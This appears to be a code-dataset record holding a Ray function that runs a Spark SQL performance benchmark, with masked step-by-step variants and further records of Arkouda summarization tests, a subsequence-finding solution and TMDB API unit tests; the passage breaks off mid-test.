run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
import ray
import os
import sys
import random
path_join = os.path.join
real_path = os.path.realpath
perfd_dir = real_path(path_join(os.getcwd()))
microps_dir = path_join(perfd_dir, "thirdparty", "microps")
sys.path += [perfd_dir, microps_dir]
from thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker
from thirdparty.microps.build.spark.driver import add_role as add_spk_role
import thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk
import thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils
@ray.remote
def run(run_config: dict, wrks: dict) -> dict:
try:
add_spk_role()
except:
print("run, spark: ignore")
os.chdir(microps_dir)
# TODO: add virtual cluster labels to the pods
base_spk_config = spk.apps_config_map["sparkperfml"]
# TODO: update driver and executor memory
base_spk_config = spk.patched_app_config(base_spk_config,
{
"app_name": run_config["appName"],
"ins_type": run_config["serverInstanceType"],
"ins_num": run_config["numExecutor"] + 1,
# "node_selectors": cur_node_selectors,
"driver_adaptive_gc": run_config["driverAdaptiveGC"],
})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b["name"] == run_config["appName"]:
bench = b
if bench is None:
print("run, spark: unable to find bench", run_config["appName"])
# spark sql perf configurations
config_base = SparkBenchMaker.load_base()
# change the dataset scale
utils.update_bench_params(base=config_base, bench=bench,
key="numExamples", value=run_config["inputScale"], is_scale=True)
# change number of partition, each executor has at least one partition
utils.update_bench_params(base=config_base, bench=bench,
key="numPartitions", value=run_config["numPartition"], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench,
key="randomSeed",
value=random.randint(0, 10000) if run_config.get("randomSeed", 1) == "random" else 1,
is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base,
{
"benchmarks": [bench]
})
print(bc)
exp = SparkExperiment(
{
"app_configs": base_spk_config,
"exp_configs": {
"s3_log_bucket": run_config["logBucket"],
"num_executor": run_config["numExecutor"],
"ins_type": run_config["serverInstanceType"],
"ins_num": run_config["numServerInstance"],
"run_interval": 0.5,
"runs": 1,
"bench_config": bc,
},
"ins_type_num": [(run_config["serverInstanceType"], run_config["numServerInstance"])],
"variables": {},
}
)
exp.run()
return {}
|
flexible
|
{
"blob_id": "25595b5f86a41fee1dc43f199f3bcff73f6d256b",
"index": 9418,
"step-1": "<mask token>\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-2": "<mask token>\nsys.path += [perfd_dir, microps_dir]\n<mask token>\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-3": "<mask token>\npath_join = os.path.join\nreal_path = os.path.realpath\nperfd_dir = real_path(path_join(os.getcwd()))\nmicrops_dir = path_join(perfd_dir, 'thirdparty', 'microps')\nsys.path += [perfd_dir, microps_dir]\n<mask token>\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-4": "import ray\nimport os\nimport sys\nimport random\npath_join = os.path.join\nreal_path = os.path.realpath\nperfd_dir = real_path(path_join(os.getcwd()))\nmicrops_dir = path_join(perfd_dir, 'thirdparty', 'microps')\nsys.path += [perfd_dir, microps_dir]\nfrom thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker\nfrom thirdparty.microps.build.spark.driver import add_role as add_spk_role\nimport thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk\nimport thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) ->dict:\n try:\n add_spk_role()\n except:\n print('run, spark: ignore')\n os.chdir(microps_dir)\n base_spk_config = spk.apps_config_map['sparkperfml']\n base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':\n run_config['appName'], 'ins_type': run_config['serverInstanceType'],\n 'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':\n run_config['driverAdaptiveGC']})\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b['name'] == run_config['appName']:\n bench = b\n if bench is None:\n print('run, spark: unable to find bench', run_config['appName'])\n config_base = SparkBenchMaker.load_base()\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numExamples', value=run_config['inputScale'], is_scale=True)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'numPartitions', value=run_config['numPartition'], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench, key=\n 'randomSeed', value=random.randint(0, 10000) if run_config.get(\n 'randomSeed', 1) == 'random' else 1, is_scale=False)\n bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [\n bench]})\n print(bc)\n exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {\n 's3_log_bucket': run_config['logBucket'], 'num_executor':\n run_config['numExecutor'], 'ins_type': run_config[\n 'serverInstanceType'], 'ins_num': run_config['numServerInstance'],\n 'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':\n [(run_config['serverInstanceType'], run_config['numServerInstance']\n )], 'variables': {}})\n exp.run()\n return {}\n",
"step-5": "import ray\nimport os\nimport sys\nimport random\n\npath_join = os.path.join\nreal_path = os.path.realpath\n\nperfd_dir = real_path(path_join(os.getcwd()))\nmicrops_dir = path_join(perfd_dir, \"thirdparty\", \"microps\")\nsys.path += [perfd_dir, microps_dir]\n\nfrom thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker\nfrom thirdparty.microps.build.spark.driver import add_role as add_spk_role\nimport thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk\nimport thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils\n\n\[email protected]\ndef run(run_config: dict, wrks: dict) -> dict:\n try:\n add_spk_role()\n except:\n print(\"run, spark: ignore\")\n os.chdir(microps_dir)\n\n # TODO: add virtual cluster labels to the pods\n base_spk_config = spk.apps_config_map[\"sparkperfml\"]\n\n # TODO: update driver and executor memory\n base_spk_config = spk.patched_app_config(base_spk_config,\n {\n \"app_name\": run_config[\"appName\"],\n \"ins_type\": run_config[\"serverInstanceType\"],\n \"ins_num\": run_config[\"numExecutor\"] + 1,\n # \"node_selectors\": cur_node_selectors,\n \"driver_adaptive_gc\": run_config[\"driverAdaptiveGC\"],\n })\n\n bench = None\n for b in SparkBenchMaker.load_benchmarks():\n if b[\"name\"] == run_config[\"appName\"]:\n bench = b\n if bench is None:\n print(\"run, spark: unable to find bench\", run_config[\"appName\"])\n\n # spark sql perf configurations\n config_base = SparkBenchMaker.load_base()\n # change the dataset scale\n utils.update_bench_params(base=config_base, bench=bench,\n key=\"numExamples\", value=run_config[\"inputScale\"], is_scale=True)\n\n # change number of partition, each executor has at least one partition\n utils.update_bench_params(base=config_base, bench=bench,\n key=\"numPartitions\", value=run_config[\"numPartition\"], is_scale=False)\n utils.update_bench_params(base=config_base, bench=bench,\n key=\"randomSeed\",\n value=random.randint(0, 10000) if run_config.get(\"randomSeed\", 1) == \"random\" else 1,\n is_scale=False)\n\n bc = SparkBenchMaker.patched_bench_config(config_base,\n {\n \"benchmarks\": [bench]\n })\n\n print(bc)\n exp = SparkExperiment(\n {\n \"app_configs\": base_spk_config,\n \"exp_configs\": {\n \"s3_log_bucket\": run_config[\"logBucket\"],\n \"num_executor\": run_config[\"numExecutor\"],\n \"ins_type\": run_config[\"serverInstanceType\"],\n \"ins_num\": run_config[\"numServerInstance\"],\n \"run_interval\": 0.5,\n \"runs\": 1,\n \"bench_config\": bc,\n },\n \"ins_type_num\": [(run_config[\"serverInstanceType\"], run_config[\"numServerInstance\"])],\n \"variables\": {},\n }\n )\n exp.run()\n return {}\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
from base_test import ArkoudaTest
from context import arkouda as ak
"""
Encapsulates unit tests for the pdarrayclass module that provide
summarized values via reduction methods
"""
class SummarizationTest(ArkoudaTest):
def setUp(self):
ArkoudaTest.setUp(self)
self.na = np.linspace(1, 10, 10)
self.pda = ak.array(self.na)
def testStd(self):
self.assertEqual(self.na.std(), self.pda.std())
def testMin(self):
self.assertEqual(self.na.min(), self.pda.min())
def testMax(self):
self.assertEqual(self.na.max(), self.pda.max())
def testMean(self):
self.assertEqual(self.na.mean(), self.pda.mean())
def testVar(self):
self.assertEqual(self.na.var(), self.pda.var())
def testAny(self):
self.assertEqual(self.na.any(), self.pda.any())
def testAll(self):
self.assertEqual(self.na.all(), self.pda.all())
|
normal
|
{
"blob_id": "88109909d0c80f25373f917426c3c3634bfc8114",
"index": 6267,
"step-1": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n <mask token>\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n <mask token>\n <mask token>\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-2": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n <mask token>\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n <mask token>\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-3": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n <mask token>\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n\n def testMax(self):\n self.assertEqual(self.na.max(), self.pda.max())\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-4": "<mask token>\n\n\nclass SummarizationTest(ArkoudaTest):\n\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n\n def testStd(self):\n self.assertEqual(self.na.std(), self.pda.std())\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n\n def testMax(self):\n self.assertEqual(self.na.max(), self.pda.max())\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-5": "import numpy as np\nfrom base_test import ArkoudaTest\nfrom context import arkouda as ak\n\n\"\"\"\nEncapsulates unit tests for the pdarrayclass module that provide\nsummarized values via reduction methods\n\"\"\"\n\n\nclass SummarizationTest(ArkoudaTest):\n def setUp(self):\n ArkoudaTest.setUp(self)\n self.na = np.linspace(1, 10, 10)\n self.pda = ak.array(self.na)\n\n def testStd(self):\n self.assertEqual(self.na.std(), self.pda.std())\n\n def testMin(self):\n self.assertEqual(self.na.min(), self.pda.min())\n\n def testMax(self):\n self.assertEqual(self.na.max(), self.pda.max())\n\n def testMean(self):\n self.assertEqual(self.na.mean(), self.pda.mean())\n\n def testVar(self):\n self.assertEqual(self.na.var(), self.pda.var())\n\n def testAny(self):\n self.assertEqual(self.na.any(), self.pda.any())\n\n def testAll(self):\n self.assertEqual(self.na.all(), self.pda.all())\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
from typing import List
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
print(Solution().findSubsequences([4, 6, 7, 7]))
|
normal
|
{
"blob_id": "3edfc1098c775fa31456aa3cc938051b2dbb8697",
"index": 1664,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def findSubsequences(self, nums: List[int]) ->List[List[int]]:\n res: List[List[int]] = []\n s = set()\n\n def deep(pos: int, tmp: List[int]):\n if pos == len(nums):\n if len(tmp) < 2:\n return\n for i in range(1, len(tmp)):\n if tmp[i - 1] > tmp[i]:\n return\n if tuple(tmp) not in s:\n res.append(tmp)\n s.add(tuple(tmp))\n else:\n deep(pos + 1, tmp)\n deep(pos + 1, tmp + [nums[pos]])\n deep(0, [])\n return res\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def findSubsequences(self, nums: List[int]) ->List[List[int]]:\n res: List[List[int]] = []\n s = set()\n\n def deep(pos: int, tmp: List[int]):\n if pos == len(nums):\n if len(tmp) < 2:\n return\n for i in range(1, len(tmp)):\n if tmp[i - 1] > tmp[i]:\n return\n if tuple(tmp) not in s:\n res.append(tmp)\n s.add(tuple(tmp))\n else:\n deep(pos + 1, tmp)\n deep(pos + 1, tmp + [nums[pos]])\n deep(0, [])\n return res\n\n\nprint(Solution().findSubsequences([4, 6, 7, 7]))\n",
"step-4": "from typing import List\n\n\nclass Solution:\n\n def findSubsequences(self, nums: List[int]) ->List[List[int]]:\n res: List[List[int]] = []\n s = set()\n\n def deep(pos: int, tmp: List[int]):\n if pos == len(nums):\n if len(tmp) < 2:\n return\n for i in range(1, len(tmp)):\n if tmp[i - 1] > tmp[i]:\n return\n if tuple(tmp) not in s:\n res.append(tmp)\n s.add(tuple(tmp))\n else:\n deep(pos + 1, tmp)\n deep(pos + 1, tmp + [nums[pos]])\n deep(0, [])\n return res\n\n\nprint(Solution().findSubsequences([4, 6, 7, 7]))\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
<|reserved_special_token_0|>
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
<|reserved_special_token_0|>
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
<|reserved_special_token_0|>
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
<|reserved_special_token_0|>
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestTmdb(BaseTestCase):
"""
Testing if we have the good responses from the api
"""
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id=69740, season_number=1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# project/tests/test_tmdb.py
import unittest
import json
from project.server import db
from project.server.models import Tmdb
from project.tests.base import BaseTestCase
class TestTmdb(BaseTestCase):
"""
Testing if we have the good responses from the api
"""
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "9e9403ea1c128e07803d080b337003055759c5ae",
"index": 4507,
"step-1": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-5": "# project/tests/test_tmdb.py\n\n\nimport unittest\nimport json\n\nfrom project.server import db\nfrom project.server.models import Tmdb\nfrom project.tests.base import BaseTestCase\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n 